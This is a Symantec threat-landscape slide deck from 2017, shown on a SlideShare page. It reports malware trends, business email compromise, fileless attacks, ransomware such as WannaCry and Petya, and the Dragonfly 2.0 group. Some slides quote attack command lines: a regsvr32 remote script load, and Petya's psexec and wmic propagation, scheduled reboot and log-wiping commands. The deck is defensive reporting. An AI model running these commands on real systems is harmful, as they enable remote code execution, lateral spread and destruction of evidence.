Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

Threat landscape update: June to September 2017

1.551 Aufrufe

Veröffentlicht am

Read about the latest trends in the threat landscape as seen between June and September 2017, including BEC and ransomware.

Veröffentlicht in: Technologie
  • Als Erste(r) kommentieren

Threat landscape update: June to September 2017

  1. 1. Presenter Date Threat Landscape Q2 / 2017 Update Asim Rab Candid Wueest Sept 2017
  2. 2. 2Copyright © 2017 Symantec Corporation General trends Simple, but successful o Low-tech attacks (BEC) o Living off the land and fileless o Emails with social engineering Focused and selective o More ransomware in corporations o Selective spreading of malware o Attacking supply chain companies
  3. 3. 3Copyright © 2017 Symantec Corporation o More than 2 Million new malware variants per day o Script malware leads to many variants Malware statistics Region % of global USA 27.26% Japan 6.49% China 6.04% India 5.82% Brazil 4.12% Germany 3.97% Great Britain 3.59% Canada 2.65% France 2.55% Russia 2.32% Australia 2.17% Italy 2.03% Mexico 1.67% South Korea 1.34% Turkey 1.28% Netherlands 1.27% Spain 1.26% Indonesia 1.11% Poland 1.08% Taiwan 0.90% 0.0 10.0 20.0 30.0 40.0 50.0 60.0 70.0 80.0 90.0 100.0 January February March April May June July August New malware variants per month in millions
  4. 4. 4Copyright © 2017 Symantec Corporation Web attacks still elevated 0 200,000 400,000 600,000 800,000 1,000,000 1,200,000 1,400,000 January February March April May June July August o Normally no 0-days exploits used o RIG toolkit is most active o Link spread by email or advertisement o Sometimes infections are restricted to specific IP addresses o Supply chain attacks increased Web attacks blocked per day
  5. 5. 5Copyright © 2017 Symantec Corporation Malicious doc containing macro with social engineering Malicious documents still common 5 Embedded binary can be double clicked
  6. 6. 6Copyright © 2017 Symantec Corporation o More than half of the malicious attachments are script files o Macros or JavaScript are usually downloading final payload o Most common payloads are ransomware and financial Trojans Email Email e.g. invoice or receipt Attachment e.g. JavaScript Downloader e.g. PowerShell Payload e.g. Ransomware Whitepaper available
  7. 7. 7Copyright © 2017 Symantec Corporation Section Business Email Compromise (BEC) 2
  8. 8. 8Copyright © 2017 Symantec Corporation 4.3 6.8 4.5 5.1 5.9 4.6 0.0 1.0 2.0 3.0 4.0 5.0 6.0 7.0 8.0 Jan Feb Mar Apr May Jun BEC email received per targeted organization Low-tech attacks: Business email compromise o Spear-phishing taken to the next level o Convince the company to perform a payment transaction o Scams often use typo-squatted domains o Some attacks change the IBAN in invoices o Exposed losses Oct 2013 – Dec 2016 was over $5bn o 8,000 businesses targeted monthly
  9. 9. 9Copyright © 2017 Symantec Corporation Create a sense of urgency, requiring immediate action, attempting to pressure the recipient into action BEC subject lines Top three subjects feature in 2/3 of all emails PAYMENT URGENT REQUEST
  10. 10. 10Copyright © 2017 Symantec Corporation Section Living off the land 3 Whitepaper available
  11. 11. 11Copyright © 2017 Symantec Corporation When attackers turn what you have against you o Fewer new files on disk o more difficult to detect attack, no IoC to share o Use off-the-shelf tools & cloud services o difficult to determine intent & source o These tools are ubiquitous o hiding in plain sight o Finding exploitable zero-day vulnerabilities is getting more difficult o use simple and proven methods such as email & social engineering Living off the land 11
  12. 12. 12Copyright © 2017 Symantec Corporation Multiple fileless options exist but not all are truly fileless Fileless attacks e.g. remote code exploits such as EternalBlue and CodeRedMemory only attacks Fileless loadpoint Non-PE files Dual-use tools Documents containing macros, PDFs with JavaScript and scripts (VBS, JavaScript, PowerShell,…) Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver Using benign tools, such as PsExec, to do malicious things
  13. 13. 13Copyright © 2017 Symantec Corporation Living off the land attack chain Exploit in memory e.g. SMB EternalBlue Email with Non-PE file e.g. document macro Weak or stolen credentials e.g. RDP password guess Incursion Remote script dropper e.g. LNK with PowerShell from cloud Memory only malware e.g. SQL Slammer Non-persistent Persistent Persistence Fileless persistence loadpoint e.g. JScript in registry Traditional methods Payload Regular non-fileless payload Non-PE file payload e.g. PowerShell script Memory only payload e.g. Mirai DDoS Dual-use tools e.g. netsh or PsExec.exe
  14. 14. 14Copyright © 2017 Symantec Corporation o Scripts are very common, especially PowerShell o Many script toolkits available, e.g. PS Empire o Scripts are easy to obfuscate and difficult to detect with signatures o Scripts are flexible and can be adapted quickly Non-PE files Whitepaper available
  15. 15. 15Copyright © 2017 Symantec Corporation Fileless loadpoints o Registry run key can point to a remote SCT file o Regsvr32 will download and execute the embedded JScript Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll Downloder.Dromedan (40,000 detections per day) o Embedded JScript uses WMI to execute a PowerShell payload o Script stores encoded DLL in the registry for later use Example: Remote SCT load Malicious.sct file
  16. 16. 16Copyright © 2017 Symantec Corporation Section Ransomware 4 Whitepaper available
  17. 17. 17Copyright © 2017 Symantec Corporation Ransomware stats o Ransomware is still profitable and common o Multiple self-propagating variants appeared 0 10,000 20,000 30,000 40,000 50,000 60,000 70,000 80,000 90,000 Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17 Trend Line Other Countries 31% United States 29% Japan 9% Italy 8% India 4% Germany 4% Netherlands 3% UK 3% Australia 3% Russia 3% Canada 3%
  18. 18. 18Copyright © 2017 Symantec Corporation o 42% of ransomware infections in 2017 were in enterprises o Due to WannaCry and Petya o Attacks against cloud storage increased Ransomware in enterprises 0 10,000 20,000 30,000 40,000 50,000 60,000 Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17 Consumer Enterprise
  19. 19. 19Copyright © 2017 Symantec Corporation o 1 Billion EternalBlue infection attempts blocked o Profit $140K, Bitcoin accounts emptied August 3rd o Linked to Lazarus group WannaCry 0 20000 40000 60000 80000 100000 120000
  20. 20. 21Copyright © 2017 Symantec Corporation o Petya (June variant) classified as a wiper o Semi-targeted infections through supply chain hack (MEDoc) o Profit $10K, Bitcoin account emptied July 4th Petya 0 20 40 60 80 100 120 140 160
  21. 21. 22Copyright © 2017 Symantec Corporation o Threat is a DLL executed by rundll32.exe o Uses recompiled version of LSADump Mimikatz to get passwords o Uses PsExec to propagate o [server_name]admin$perfc.dat o psexec rundll32.exe c:windowsperfc.dat #1 [RANDOM] o Uses WMI to propagate if PsExec fails o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create “%System%rundll32.exe “%Windows%perfc.dat" #1 60” o Scheduled task to restart into the malicious MBR payload o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%shutdown14:42.exe /r /f" /ST o Deletes log files to hide traces o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C: Petya uses dual-use tools
  22. 22. 23Copyright © 2017 Symantec Corporation Section Targeted attack groups 5
  23. 23. 24Copyright © 2017 Symantec Corporation o Active since December 2015 in Europe and North America o Ongoing attacks against energy sector, mainly in Turkey and U.S. Infiltration o Compromised websites and spear phishing (Phishery toolkit) o Trojanized software, using Shelter evasion framework o Various backdoors: Dragonfly 2.0 • Trojan.Listrix • Trojan.Credrix • Backdoor.Goodor • Backdoor.Dorshell • Trojan.Karagany.B • Trojan.Heriplor Slide deck available
  24. 24. 25Copyright © 2017 Symantec Corporation o Uses living off the land tactics o PowerShell, PsExec, and BITSAdmin o Phisherly toolkit became available on GitHub in 2016 o Document used SMB template link to leak credentials o Screenutil and Shelter are available online Goal o Information stealing: passwords, documents and screenshots o Potential for sabotage attacks Dragonfly 2.0
  25. 25. 26Copyright © 2017 Symantec Corporation o Many cases where legitimate software was compromised o Fast and semi-targeted distribution through update process o Trojanized updates are difficult to discover o Trusted domain, digitally signed, trusted update process,… Examples: o MEdoc (Petya June/2017) o CCleaner (Aug/2017) o Python modules (Sept/2017) o ICS supplier (Dragonfly 2014) Supply chain attacks increasing
  26. 26. 27Copyright © 2017 Symantec Corporation o Cybercriminals are focusing on simple but effective methods o Ransomware is still very prevalent o Living off the land tactics are increasingly used o Often targeted infections with limited distribution Summary